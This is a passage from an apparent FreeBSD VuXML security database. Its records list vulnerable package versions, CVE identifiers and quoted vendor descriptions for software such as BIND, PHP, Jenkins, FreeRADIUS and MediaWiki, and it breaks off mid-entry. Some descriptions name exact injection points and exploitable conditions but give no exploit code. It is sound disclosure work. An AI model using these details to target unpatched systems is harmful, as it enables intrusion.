<p>MFSA 2012-87 Use-after-free in the IME State Manager</p>
<p>MFSA 2012-88 Miscellaneous memory safety hazards (rv:16.0.1)</p>
<p>MFSA 2012-89 defaultValue security checks not applied</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-3982</cvename>
<cvename>CVE-2012-3983</cvename>
<cvename>CVE-2012-3984</cvename>
<cvename>CVE-2012-3985</cvename>
<cvename>CVE-2012-3986</cvename>
<cvename>CVE-2012-3987</cvename>
<cvename>CVE-2012-3988</cvename>
<cvename>CVE-2012-3989</cvename>
<cvename>CVE-2012-3990</cvename>
<cvename>CVE-2012-3991</cvename>
<cvename>CVE-2012-3992</cvename>
<cvename>CVE-2012-3993</cvename>
<cvename>CVE-2012-3994</cvename>
<cvename>CVE-2012-3995</cvename>
<cvename>CVE-2012-4179</cvename>
<cvename>CVE-2012-4180</cvename>
<cvename>CVE-2012-4181</cvename>
<cvename>CVE-2012-4182</cvename>
<cvename>CVE-2012-4183</cvename>
<cvename>CVE-2012-4184</cvename>
<cvename>CVE-2012-4186</cvename>
<cvename>CVE-2012-4187</cvename>
<cvename>CVE-2012-4188</cvename>
<cvename>CVE-2012-4190</cvename>
<cvename>CVE-2012-4191</cvename>
<cvename>CVE-2012-4192</cvename>
<cvename>CVE-2012-4193</cvename>
<url>http://www.mozilla.org/security/known-vulnerabilities/</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-74.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-75.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-76.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-77.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-78.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-79.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-80.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-81.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-82.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-83.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-84.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-85.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-86.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-87.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-88.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-89.html</url>
</references>
<dates>
<discovery>2012-10-09</discovery>
<entry>2012-10-10</entry>
<modified>2012-10-11</modified>
</dates>
</vuln>
<vuln vid="57a700f9-12c0-11e2-9f86-001d923933b6">
<topic>dns/bind9* -- crash on deliberately constructed combination of records</topic>
<affects>
<package>
<name>bind99</name>
<range><lt>9.9.1.4</lt></range>
</package>
<package>
<name>bind99-base</name>
<range><lt>9.9.1.4</lt></range>
</package>
<package>
<name>bind98</name>
<range><lt>9.8.3.4</lt></range>
</package>
<package>
<name>bind98-base</name>
<range><lt>9.8.3.4</lt></range>
</package>
<package>
<name>bind97</name>
<range><lt>9.7.6.4</lt></range>
</package>
<package>
<name>bind97-base</name>
<range><lt>9.7.6.4</lt></range>
</package>
<package>
<name>bind96</name>
<range><lt>9.6.3.1.ESV.R7.4</lt></range>
</package>
<package>
<name>bind96-base</name>
<range><lt>9.6.3.1.ESV.R7.4</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>ISC reports:</p>
<blockquote cite="https://kb.isc.org/article/AA-00801/">
<p>A deliberately constructed combination of records could cause named
to hang while populating the additional section of a response.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-5166</cvename>
</references>
<dates>
<discovery>2012-09-26</discovery>
<entry>2012-10-10</entry>
</dates>
</vuln>
<vuln vid="dee44ba9-08ab-11e2-a044-d0df9acfd7e5">
<topic>OpenX -- SQL injection vulnerability</topic>
<affects>
<package>
<name>openx</name>
<range><lt>2.8.10</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Secunia reports:</p>
<blockquote cite="http://secunia.com/advisories/50598/">
<p>A vulnerability has been discovered in OpenX, which can be
exploited by malicious people to conduct SQL injection
attacks.</p>
<p>Input passed via the "xajaxargs" parameter to
www/admin/updates-history.php (when "xajax" is set to
"expandOSURow") is not properly sanitised in e.g. the
"queryAuditBackupTablesByUpgradeId()" function
(lib/OA/Upgrade/DB_UpgradeAuditor.php) before being used in SQL
queries. This can be exploited to manipulate SQL queries by
injecting arbitrary SQL code.</p>
<p>The vulnerability is confirmed in version 2.8.9. Prior versions
may also be affected.</p>
</blockquote>
</body>
</description>
<references>
<url>http://secunia.com/advisories/50598/</url>
</references>
<dates>
<discovery>2012-09-14</discovery>
<entry>2012-09-27</entry>
</dates>
</vuln>
<vuln vid="73efb1b7-07ec-11e2-a391-000c29033c32">
<topic>eperl -- Remote code execution</topic>
<affects>
<package>
<name>eperl</name>
<range><le>2.2.14_4</le></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>David Madison reports:</p>
<blockquote cite="http://www.shmoo.com/mail/bugtraq/jun01/msg00286.shtml">
<p>ePerl is a multipurpose Perl filter and interpreter program
for Unix systems. The ePerl preprocessor contains an input
validation error. The preprocessor allows foreign data to be
"safely" included using the 'sinclude' directive.</p>
<p>The problem occurs when a file referenced by a 'sinclude'
directive contains a 'include' directive; the contents of
the file referred to by the second directive will be loaded
and executed.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2001-0733</cvename>
<url>http://www.shmoo.com/mail/bugtraq/jun01/msg00286.shtml</url>
<bid>2912</bid>
<url>http://xforce.iss.net/xforce/xfdb/6743</url>
<url>http://osvdb.org/show/osvdb/1880</url>
</references>
<dates>
<discovery>2001-06-21</discovery>
<entry>2012-09-26</entry>
</dates>
</vuln>
<vuln vid="98690c45-0361-11e2-a391-000c29033c32">
<topic>ImageMagick and GraphicsMagick -- DoS via specially crafted PNG file</topic>
<affects>
<package>
<name>ImageMagick</name>
<range><le>6.7.8.6</le></range>
</package>
<package>
<name>ImageMagick-nox11</name>
<range><le>6.7.8.6</le></range>
</package>
<package>
<name>GraphicsMagick</name>
<range><ge>1.3.0</ge><le>1.3.16</le></range>
</package>
<package>
<name>GraphicsMagick-nox11</name>
<range><ge>1.3.0</ge><le>1.3.16</le></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Kurt Seifried reports:</p>
<blockquote cite="https://bugzilla.redhat.com/show_bug.cgi?id=844105">
<p>There is an issue in ImageMagick that is also present in
GraphicsMagick. CVE-2011-3026 deals with libpng memory
allocation, and limitations have been added so that a bad PNG
can't cause the system to allocate a lot of memory and a
denial of service. However on further investigation of
ImageMagick, Tom Lane found that PNG malloc function
(Magick_png_malloc) in turn calls AcquireMagickMemory with an
improper size argument.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-3438</cvename>
<url>https://bugzilla.redhat.com/show_bug.cgi?id=844105</url>
<bid>54716</bid>
<url>http://secunia.com/advisories/50090</url>
<url>http://xforce.iss.net/xforce/xfdb/77259</url>
<url>http://osvdb.org/show/osvdb/84323</url>
</references>
<dates>
<discovery>2012-07-28</discovery>
<entry>2012-09-20</entry>
<modified>2014-04-30</modified>
</dates>
</vuln>
<vuln vid="ec255bd8-02c6-11e2-92d1-000d601460a4">
<topic>php5-sqlite -- open_basedir bypass</topic>
<affects>
<package>
<name>php5-sqlite</name>
<range><ge>5.2</ge><lt>5.2.17_11</lt></range>
<range><ge>5.3</ge><lt>5.3.15</lt></range>
</package>
<package>
<name>php52-sqlite</name>
<range><lt>5.2.17_11</lt></range>
</package>
<package>
<name>php53-sqlite</name>
<range><lt>5.3.15</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>MITRE CVE team reports:</p>
<blockquote cite="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3365">
<p>The SQLite functionality in PHP before 5.3.15 allows remote
attackers to bypass the open_basedir protection mechanism via
unspecified vectors.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-3365</cvename>
<url>https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3365</url>
</references>
<dates>
<discovery>2012-06-14</discovery>
<entry>2012-09-19</entry>
</dates>
</vuln>
<vuln vid="9b2a5e88-02b8-11e2-92d1-000d601460a4">
<topic>php5 -- Denial of Service in php_date_parse_tzfile()</topic>
<affects>
<package>
<name>php5</name>
<range><ge>5.2</ge><lt>5.2.17_11</lt></range>
<range><ge>5.3</ge><lt>5.3.9</lt></range>
</package>
<package>
<name>php52</name>
<range><lt>5.2.17_11</lt></range>
</package>
<package>
<name>php53</name>
<range><lt>5.3.9</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>MITRE CVE team reports:</p>
<blockquote cite="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0789">
<p>Memory leak in the timezone functionality in PHP before 5.3.9
allows remote attackers to cause a denial of service (memory
consumption) by triggering many strtotime function calls, which are
not properly handled by the php_date_parse_tzfile cache.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-0789</cvename>
<url>https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0789</url>
<url>https://bugs.php.net/bug.php?id=53502</url>
</references>
<dates>
<discovery>2010-12-08</discovery>
<entry>2012-09-19</entry>
</dates>
</vuln>
<vuln vid="53a0ddef-0208-11e2-8afa-0024e830109b">
<topic>dns/bind9* -- Several vulnerabilities</topic>
<affects>
<package>
<name>bind99</name>
<range><lt>9.9.1.3</lt></range>
</package>
<package>
<name>bind98</name>
<range><lt>9.8.3.3</lt></range>
</package>
<package>
<name>bind97</name>
<range><lt>9.7.6.3</lt></range>
</package>
<package>
<name>bind96</name>
<range><lt>9.6.3.1.ESV.R7.3</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>ISC reports:</p>
<blockquote cite="https://kb.isc.org/article/AA-00788">
<p>Prevents a crash when queried for a record whose RDATA exceeds
65535 bytes.</p>
<p>Prevents a crash when validating caused by using "Bad cache" data
before it has been initialized.</p>
<p>ISC_QUEUE handling for recursive clients was updated to address
a race condition that could cause a memory leak. This rarely
occurred with UDP clients, but could be a significant problem
for a server handling a steady rate of TCP queries.</p>
<p>A condition has been corrected where improper handling of
zero-length RDATA could cause undesirable behavior, including
termination of the named process.</p>
</blockquote>
</body>
</description>
<references>
<url/>
</references>
<dates>
<discovery>2012-09-12</discovery>
<entry>2012-09-18</entry>
</dates>
</vuln>
<vuln vid="d846af5b-00f4-11e2-b6d0-00e0814cab4e">
<topic>jenkins -- multiple vulnerabilities</topic>
<affects>
<package>
<name>jenkins</name>
<range><lt>1.482</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Jenkins Security Advisory reports:</p>
<blockquote cite="https://wiki.jenkins-ci.org/display/SECURITY/Jenkins+Security+Advisory+2012-09-17">
<p>This advisory announces security vulnerabilities that were found
in Jenkins core and several plugins.</p>
<ol>
<li>The first vulnerability in Jenkins core allows unprivileged
users to insert data into Jenkins master, which can lead to
remote code execution. For this vulnerability to be exploited,
the attacker must have an HTTP access to a Jenkins master, and
he must have a read access to Jenkins.</li>
<li>The second vulnerability in Jenkins core is a cross-site
scripting vulnerability. This allows an attacker to craft an URL
that points to Jenkins, and if a legitimate user clicks this link,
and the attacker will be able to hijack the user session.</li>
<li>The third vulnerability is a cross-site scripting vulnerability
in the Violations plugin</li>
<li>The fourth vulnerability is a cross-site scripting vulnerability
in The Continuous Integration Game plugin</li>
</ol>
</blockquote>
</body>
</description>
<references>
<url>https://wiki.jenkins-ci.org/display/SECURITY/Jenkins+Security+Advisory+2012-09-17</url>
</references>
<dates>
<discovery>2012-09-17</discovery>
<entry>2012-09-17</entry>
</dates>
</vuln>
<vuln vid="62f36dfd-ff56-11e1-8821-001b2134ef46">
<topic>vlc -- arbitrary code execution in Real RTSP and MMS support</topic>
<affects>
<package>
<name>vlc</name>
<range><lt>2.0.1,3</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Jean-Baptiste Kempf, on behalf of the VideoLAN project reports:</p>
<blockquote cite="http://www.videolan.org/security/sa1201.html">
<p>If successful, a malicious third party could crash the VLC
media player process. Arbitrary code execution could be possible
on some systems.</p>
</blockquote>
</body>
</description>
<references>
<url>http://www.videolan.org/security/sa1201.html</url>
<url>http://www.videolan.org/security/sa1202.html</url>
<cvename>CVE-2012-1775</cvename>
<cvename>CVE-2012-1776</cvename>
</references>
<dates>
<discovery>2012-03-12</discovery>
<entry>2012-09-15</entry>
</dates>
</vuln>
<vuln vid="143f6932-fedb-11e1-ad4a-003067b2972c">
<topic>bacula -- Console ACL Bypass</topic>
<affects>
<package>
<name>bacula</name>
<range><lt>5.2.11</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<blockquote cite="https://secunia.com/advisories/50535/">
<p>A security issue has been reported in Bacula, which can be
exploited by malicious users to bypass certain security
restrictions.</p>
<p>The security issue is caused due to an error within the implementation
of console ACLs, which can be exploited to gain access to certain
restricted functionality and e.g. dump resources.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-4430</cvename>
<url>http://www.bacula.org/git/cgit.cgi/bacula/commit/?id=67debcecd3d530c429e817e1d778e79dcd1db905</url>
<url>https://secunia.com/advisories/50535/</url>
<url>http://sourceforge.net/projects/bacula/files/bacula/5.2.11/ReleaseNotes/view</url>
</references>
<dates>
<discovery>2012-09-12</discovery>
<entry>2012-09-15</entry>
</dates>
</vuln>
<vuln vid="178ba4ea-fd40-11e1-b2ae-001fd0af1a4c">
<topic>mod_pagespeed -- multiple vulnerabilities</topic>
<affects>
<package>
<name>mod_pagespeed</name>
<range><lt>0.10.22.6</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Google Reports:</p>
<blockquote cite="https://developers.google.com/speed/docs/mod_pagespeed/announce-0.10.22.6">
<p>mod_pagespeed 0.10.22.6 is a security update that fixes two
critical issues that affect earlier versions:</p>
<ul>
<li>CVE-2012-4001, a problem with validation of own host name.</li>
<li>CVE-2012-4360, a cross-site scripting attack, which affects versions starting from 0.10.19.1.</li>
</ul>
<p>The effect of the first problem is that it is possible to confuse
mod_pagespeed about its own host name, and to trick it into
fetching resources from other machines. This could be an issue if
the HTTP server has access to machines that are not otherwise
publicly visible.</p>
<p>The second problem would permit a hostile third party to execute
JavaScript in users' browsers in context of the domain running
mod_pagespeed, which could permit interception of users' cookies or
data on the site.</p>
<p>Because of the severity of the two problems, users are strongly
encouraged to update immediately.</p>
<p>Behavior Changes in the Update:</p>
<p>As part of the fix to the first issue, mod_pagespeed will not fetch
resources from machines other than localhost if they are not
explicitly mentioned in the configuration. This means that if you
need resources on the server's domain to be handled by some other
system, you'll need to explicitly use ModPagespeedMapOriginDomain
or ModPagespeedDomain to authorize that.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-4001</cvename>
<cvename>CVE-2012-4360</cvename>
<url>https://developers.google.com/speed/docs/mod_pagespeed/announce-0.10.22.6</url>
</references>
<dates>
<discovery>2012-09-12</discovery>
<entry>2012-09-12</entry>
</dates>
</vuln>
<vuln vid="3bbbe3aa-fbeb-11e1-8bd8-0022156e8794">
<topic>freeradius -- arbitrary code execution for TLS-based authentication</topic>
<affects>
<package>
<name>freeradius</name>
<range><ge>2.1.10</ge><lt>2.1.12_2</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>freeRADIUS security team reports:</p>
<blockquote cite="http://freeradius.org/security.html">
<p>Overflow in EAP-TLS for 2.1.10, 2.1.11 and 2.1.12.</p>
<p>The issue was found by Timo Warns, and communicated to
security@freeradius.org. A sample exploit for the issue was
included in the notification.</p>
<p>The vulnerability was created in commit a368a6f4f4aaf on
August 18, 2010. Vulnerable versions include 2.1.10, 2.1.11,
and 2.1.12. Also anyone running the git "master" branch
after August 18, 2010 is vulnerable.</p>
<p>All sites using TLS-based EAP methods and the above
versions are vulnerable. The only configuration change which
can avoid the issue is to disable EAP-TLS, EAP-TTLS, and
PEAP.</p>
<p>An external attacker can use this vulnerability to
over-write the stack frame of the RADIUS server, and cause
it to crash. In addition, more sophisticated attacks may
gain additional privileges on the system running the RADIUS
server.</p>
<p>This attack does not require local network access to the
RADIUS server. It can be done by an attacker through a WiFi
Access Point, so long as the Access Point is configured to
use 802.1X authentication with the RADIUS server.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-3547</cvename>
<url>http://freeradius.org/security.html</url>
<url>http://www.pre-cert.de/advisories/PRE-SA-2012-06.txt</url>
</references>
<dates>
<discovery>2012-09-10</discovery>
<entry>2012-09-11</entry>
<modified>2012-09-11</modified>
</dates>
</vuln>
<vuln vid="c1e5f35e-f93d-11e1-b07f-00235a5f2c9a">
<topic>emacs -- remote code execution vulnerability</topic>
<affects>
<package>
<name>emacs</name>
<range><gt>24.*</gt><lt>24.2</lt></range>
<range><gt>23.*</gt><le>23.4_2</le></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Chong Yidong reports:</p>
<blockquote cite="http://www.openwall.com/lists/oss-security/2012/08/13/1">
<p>Paul Ling has found a security flaw in the file-local
variables code in GNU Emacs.</p>
<p>When the Emacs user option `enable-local-variables' is
set to `:safe' (the default value is t), Emacs should
automatically refuse to evaluate `eval' forms in file-local
variable sections. Due to the bug, Emacs instead
automatically evaluates such `eval' forms. Thus, if the user
changes the value of `enable-local-variables' to `:safe',
visiting a malicious file can cause automatic execution of
arbitrary Emacs Lisp code with the permissions of the
user.</p>
<p>The bug is present in Emacs 23.2, 23.3, 23.4, and
24.1.</p>
</blockquote>
</body>
</description>
<references>
<bid>54969</bid>
<cvename>CVE-2012-3479</cvename>
<url>https://lists.gnu.org/archive/html/emacs-devel/2012-08/msg00802.html</url>
<url>http://debbugs.gnu.org/cgi/bugreport.cgi?bug=12155</url>
</references>
<dates>
<discovery>2012-08-13</discovery>
<entry>2012-09-08</entry>
<modified>2013-05-13</modified>
</dates>
</vuln>
<vuln vid="30149157-f926-11e1-95cd-001fd0af1a4c">
<topic>wordpress -- multiple unspecified privilege escalation bugs</topic>
<affects>
<package>
<name>wordpress</name>
<range><lt>3.4.2</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Wordpress reports:</p>
<blockquote cite="http://wordpress.org/news/2012/09/wordpress-3-4-2/">
<p>Version 3.4.2 also fixes a few security issues and contains some
security hardening. The vulnerabilities included potential
privilege escalation and a bug that affects multisite installs with
untrusted users. These issues were discovered and fixed by the
WordPress security team.</p>
</blockquote>
</body>
</description>
<references>
<url>http://wordpress.org/news/2012/09/wordpress-3-4-2/</url>
</references>
<dates>
<discovery>2012-09-06</discovery>
<entry>2012-09-07</entry>
</dates>
</vuln>
<vuln vid="4a8a98ab-f745-11e1-8bd8-0022156e8794">
<topic>moinmoin -- cross-site scripting via RST parser</topic>
<affects>
<package>
<name>moinmoin</name>
<range><lt>1.9.4</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>MITRE CVE team reports:</p>
<blockquote cite="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1058">
<p>Cross-site scripting (XSS) vulnerability in the
reStructuredText (rst) parser in parser/text_rst.py in
MoinMoin before 1.9.4, when docutils is installed or when
"format rst" is set, allows remote attackers to inject
arbitrary web script or HTML via a javascript: URL in the
refuri attribute.</p>
</blockquote>
</body>
</description>
<references>
<bid>46476</bid>
<cvename>CVE-2011-1058</cvename>
<url>http://moinmo.in/SecurityFixes</url>
</references>
<dates>
<discovery>2011-02-21</discovery>
<entry>2012-09-05</entry>
</dates>
</vuln>
<vuln vid="4f99e2ef-f725-11e1-8bd8-0022156e8794">
<topic>moinmoin -- wrong processing of group membership</topic>
<affects>
<package>
<name>moinmoin</name>
<range><ge>1.9</ge><lt>1.9.4_1</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>MoinMoin developers report:</p>
<blockquote cite="http://hg.moinmo.in/moin/1.9/rev/7b9f39289e16">
<p>If you have group NAMES containing "All" or "Known" or
"Trusted", they behaved wrong until now (they erroneously
included All/Known/Trusted users even if you did not list
them as members), but will start working correctly with this
changeset.</p>
<p>E.g. AllFriendsGroup:</p>
<ul>
<li>JoeDoe</li>
</ul>
<p>AllFriendsGroup will now (correctly) include only JoeDoe.
It (erroneously) contained all users (including JoeDoe)
before.</p>
<p>E.g. MyTrustedFriendsGroup:</p>
<ul>
<li>JoeDoe</li>
</ul>
<p>MyTrustedFriendsGroup will now (correctly) include only
JoeDoe. It (erroneously) contained all trusted users and
JoeDoe before.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-4404</cvename>
<url>http://hg.moinmo.in/moin/1.9/rev/7b9f39289e16</url>
</references>
<dates>
<discovery>2012-09-03</discovery>
<entry>2012-09-05</entry>
<modified>2012-09-11</modified>
</dates>
</vuln>
<vuln vid="918f38cd-f71e-11e1-8bd8-0022156e8794">
<topic>php5 -- header splitting attack via carriage-return character</topic>
<affects>
<package>
<name>php5</name>
<range><ge>5.2</ge><lt>5.2.17_11</lt></range>
<range><ge>5.3</ge><lt>5.3.11</lt></range>
<range><ge>5.4</ge><lt>5.4.1</lt></range>
</package>
<package>
<name>php52</name>
<range><lt>5.2.17_11</lt></range>
</package>
<package>
<name>php53</name>
<range><lt>5.3.11</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Rui Hirokawa reports:</p>
<blockquote cite="https://bugs.php.net/bug.php?id=60227">
<p>As of PHP 5.1.2, header() can no longer be used to send
multiple response headers in a single call to prevent the
HTTP Response Splitting Attack. header() only checks the
linefeed (LF, 0x0A) as line-end marker, it doesn't check the
carriage-return (CR, 0x0D).</p>
<p>However, some browsers including Google Chrome, IE also
recognize CR as the line-end.</p>
<p>The current specification of header() still has the
vulnerability against the HTTP header splitting attack.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2011-1398</cvename>
<url>https://bugs.php.net/bug.php?id=60227</url>
</references>
<dates>
<discovery>2011-11-06</discovery>
<entry>2012-09-05</entry>
<modified>2012-09-19</modified>
</dates>
</vuln>
<vuln vid="b50913ce-f4a7-11e1-b135-003067b2972c">
<topic>bitcoin -- denial of service</topic>
<affects>
<package>
<name>bitcoin</name>
<range><lt>0.6.3</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<blockquote cite="https://bitcointalk.org/?topic=88734">
<p>A unspecified denial-of-service attack that could cause the
bitcoin process to become unresponsive was found.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-3789</cvename>
<url>https://bitcointalk.org/?topic=88734</url>
</references>
<dates>
<discovery>2012-07-20</discovery>
<entry>2012-09-02</entry>
</dates>
</vuln>
<vuln vid="6ad18fe5-f469-11e1-920d-20cf30e32f6d">
<topic>bugzilla -- multiple vulnerabilities</topic>
<affects>
<package>
<name>bugzilla</name>
<range><ge>3.6.0</ge><lt>3.6.11</lt></range>
<range><ge>4.0.0</ge><lt>4.0.8</lt></range>
<range><ge>4.2.0</ge><lt>4.2.3</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<h1>A Bugzilla Security Advisory reports:</h1>
<blockquote cite="http://www.bugzilla.org/security/3.6.10/">
<p>The following security issues have been discovered in
Bugzilla:</p>
<h1>LDAP Injection</h1>
<p>When the user logs in using LDAP, the username is not
escaped when building the uid=$username filter which is
used to query the LDAP directory. This could potentially
lead to LDAP injection.</p>
<h1>Directory Browsing</h1>
<p>Extensions are not protected against directory browsing
and users can access the source code of the templates
which may contain sensitive data.
Directory browsing is blocked in Bugzilla 4.3.3 only,
because it requires a configuration change in the Apache
httpd.conf file to allow local .htaccess files to use
Options -Indexes. To not break existing installations,
this fix has not been backported to stable branches.
The access to templates is blocked for all supported
branches except the old 3.6 branch, because this branch
doesn't have .htaccess in the bzr repository and cannot
be fixed easily for existing installations without
potentially conflicting with custom changes.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-3981</cvename>
<url>https://bugzilla.mozilla.org/show_bug.cgi?id=785470</url>
<url>https://bugzilla.mozilla.org/show_bug.cgi?id=785522</url>
<url>https://bugzilla.mozilla.org/show_bug.cgi?id=785511</url>
</references>
<dates>
<discovery>2012-08-30</discovery>
<entry>2012-09-01</entry>
</dates>
</vuln>
<vuln vid="342176a8-f464-11e1-8bd8-0022156e8794">
<topic>GNU gatekeeper -- denial of service</topic>
<affects>
<package>
<name>gatekeeper</name>
<range><lt>3.1</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Jan Willamowius reports:</p>
<blockquote cite="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-3534">
<p>GNU Gatekeeper before 3.1 does not limit the number
of connections to the status port, which allows remote
attackers to cause a denial of service (connection and
thread consumption) via a large number of connections.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-3534</cvename>
<url>http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-3534</url>
<url>http://www.openwall.com/lists/oss-security/2012/08/25/4</url>
<url>http://www.gnugk.org/gnugk-3.1.html</url>
</references>
<dates>
<discovery>2012-08-15</discovery>
<entry>2012-09-01</entry>
</dates>
</vuln>
<vuln vid="7c0fecd6-f42f-11e1-b17b-000c2977ec30">
<topic>mediawiki -- multiple vulnerabilities</topic>
<affects>
<package>
<name>mediawiki</name>
<range><ge>1.19</ge><lt>1.19.2</lt></range>
<range><ge>1.18</ge><lt>1.18.5</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Mediawiki reports:</p>
<blockquote cite="http://lists.wikimedia.org/pipermail/mediawiki-announce/2012-August/000119.html">
<p>(Bug 39700) Wikipedia administrator Writ Keeper discovered
a stored XSS (HTML injection) vulnerability. This was
possible due to the handling of link text on File: links for
nonexistent files. MediaWiki 1.16 and later is affected.</p>
<p>(Bug 39180) User Fomafix reported several DOM-based XSS
vulnerabilities, made possible by a combination of loose
filtering of the uselang parameter, and JavaScript gadgets
on various language Wikipedias.</p>
<p>(Bug 39180) During internal review, it was discovered that
CSRF tokens, available via the api, were not protected with
X-Frame-Options headers. This could lead to a CSRF vulnerability
if the API response is embedded in an external website using
using an iframe.</p>
<p>(Bug 39824) During internal review, it was discovered extensions
were not always allowed to prevent the account creation action.
This allowed users blocked by the GlobalBlocking extension to
create accounts.</p>
<p>(Bug 39184) During internal review, it was discovered that
password data was always saved to the local MediaWiki database
even if authentication was handled by an extension, such as LDAP.
This could allow a compromised MediaWiki installation to leak
information about user's LDAP passwords. Additionally, in situations
when an authentication plugin returned false in its strict
function, this would allow old passwords to be used for accounts
that did not exist in the external system, indefinitely.</p>
<p>(Bug 39823) During internal review, it was discovered that metadata
about blocks, hidden by a user with suppression rights, was visible
to administrators.</p>
</blockquote>
</body>
</description>
<references>
<url>https://bugzilla.wikimedia.org/show_bug.cgi?id=39700</url>
<url>https://bugzilla.wikimedia.org/show_bug.cgi?id=37587</url>
<url>https://bugzilla.wikimedia.org/show_bug.cgi?id=39180</url>
<url>https://bugzilla.wikimedia.org/show_bug.cgi?id=39824</url>
<url>https://bugzilla.wikimedia.org/show_bug.cgi?id=39184</url>
<url>https://bugzilla.wikimedia.org/show_bug.cgi?id=39823</url>
<cvename>CVE-2012-4377</cvename>
<cvename>CVE-2012-4378</cvename>
<cvename>CVE-2012-4379</cvename>
<cvename>CVE-2012-4380</cvename>
<cvename>CVE-2012-4381</cvename>
<cvename>CVE-2012-4382</cvename>
</references>
<dates>
<discovery>2012-08-27</discovery>
<entry>2012-09-01</entry>
</dates>
</vuln>
<vuln vid="5415f1b3-f33d-11e1-8bd8-0022156e8794">
<topic>wireshark -- denial of service in DRDA dissector</topic>
<affects>
<package>
<name>wireshark</name>
<range><ge>1.5</ge><lt>1.8.2_1</lt></range>
</package>
<package>
<name>wireshark-lite</name>
<range><ge>1.5</ge><lt>1.8.2_1</lt></range>
</package>
<package>
<name>tshark</name>
<range><ge>1.5</ge><lt>1.8.2_1</lt></range>
</package>
<package>
<name>tshark-lite</name>
<range><ge>1.5</ge><lt>1.8.2_1</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>RedHat security team reports:</p>
<blockquote cite="https://bugzilla.redhat.com/show_bug.cgi?id=849926">
<p>A denial of service flaw was found in the way Distributed
Relational Database Architecture (DRDA) dissector of
Wireshark, a network traffic analyzer, performed processing
of certain DRDA packet capture files. A remote attacker
could create a specially-crafted capture file that, when
opened could lead to wireshark executable to consume
excessive amount of CPU time and hang with an infinite
loop.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-3548</cvename>
<url>https://bugzilla.redhat.com/show_bug.cgi?id=849926</url>
</references>
<dates>
<discovery>2012-08-21</discovery>
<entry>2012-08-31</entry>
<modified>2012-09-05</modified>
</dates>
</vuln>
<vuln vid="4c53f007-f2ed-11e1-a215-14dae9ebcf89">
<topic>asterisk -- multiple vulnerabilities</topic>
<affects>
<package>
<name>asterisk</name>
<range><gt>10.*</gt><lt>10.7.1</lt></range>
</package>
<package>
<name>asterisk18</name>
<range><gt>1.8.*</gt><lt>1.8.15.1</lt></range>
</package>
</affects>
<description>
